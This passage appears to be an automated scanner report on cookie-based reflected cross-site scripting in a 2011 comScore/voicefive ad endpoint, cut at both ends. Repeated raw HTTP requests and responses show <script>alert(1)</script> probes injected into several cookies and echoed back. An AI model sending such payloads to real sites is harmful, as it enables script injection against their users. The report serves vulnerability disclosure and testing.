Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de) ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2Ca5843<script>alert(1)</script>408a77c22b1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:51:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=45&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:51:38 2011&prad=58087449&arc=39969205&; expires=Sat 07-May-2011 20:51:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26745
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087449",Pid:"p85001580",Arc:"39969205",Location:CO ...[SNIP]... "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2Ca5843<script>alert(1)</script>408a77c22b1', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&', "BMX_3PC": '1', "ar_p45555483": ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 52760<script>alert(1)</script>f9fa39cddad was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-129445681052760<script>alert(1)</script>f9fa39cddad; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:42:54 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:54 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:54 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297024974; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... ();}COMSCORE.BMX.Broker.Cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-129445681052760<script>alert(1)</script>f9fa39cddad', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01: ...[SNIP]...
The value of the ar_da39f516a098b3de) ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload bb37a<script>alert(1)</script>cd3cb17e9d3 was submitted in the ar_da39f516a098b3de) ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000743177/mnum=0000967044/cstr=83872517=_4d4f09d3,3366570328,743177_967044_1183_0,1_/xsxdata=1:93310694/bnum=83872517/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/300/L32/117431738/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_300/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/628576703/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=628576703?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de) ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&bb37a<script>alert(1)</script>cd3cb17e9d3; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:51:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=45&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:51:38 2011&bb37a<script>alert(1)</script>cd3cb17e9d3=&prad=58087449&arc=39969205&; expires=Sat 07-May-2011 20:51:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26745
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087449",Pid:"p85001580",Arc:"39969205",Location:CO ...[SNIP]... 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&bb37a<script>alert(1)</script>cd3cb17e9d3', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464& ...[SNIP]...
The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 19297<script>alert(1)</script>9d318ae0ab8 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&19297<script>alert(1)</script>9d318ae0ab8; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:42:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:53 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297024973; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... d Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&19297<script>alert(1)</script>9d318ae0ab8', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:4 ...[SNIP]...
The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 2cb01<script>alert(1)</script>6aef59c8b14 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&2cb01<script>alert(1)</script>6aef59c8b14; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:42:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:53 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297024973; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... ();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&2cb01<script>alert(1)</script>6aef59c8b14', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01: ...[SNIP]...
The value of the ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 3ba10<script>alert(1)</script>1bfb37122a3 was submitted in the ar_p68511049 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&3ba10<script>alert(1)</script>1bfb37122a3; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:42:54 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:54 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:54 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297024974; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&3ba10<script>alert(1)</script>1bfb37122a3' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 7d5aa<script>alert(1)</script>64b08d03421 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&7d5aa<script>alert(1)</script>64b08d03421; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:42:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:53 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297024973; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&7d5aa<script>alert(1)</script>64b08d03421', "ar_p68511049": 'exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket. ...[SNIP]...
The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload d77e0<script>alert(1)</script>688bd651f98 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
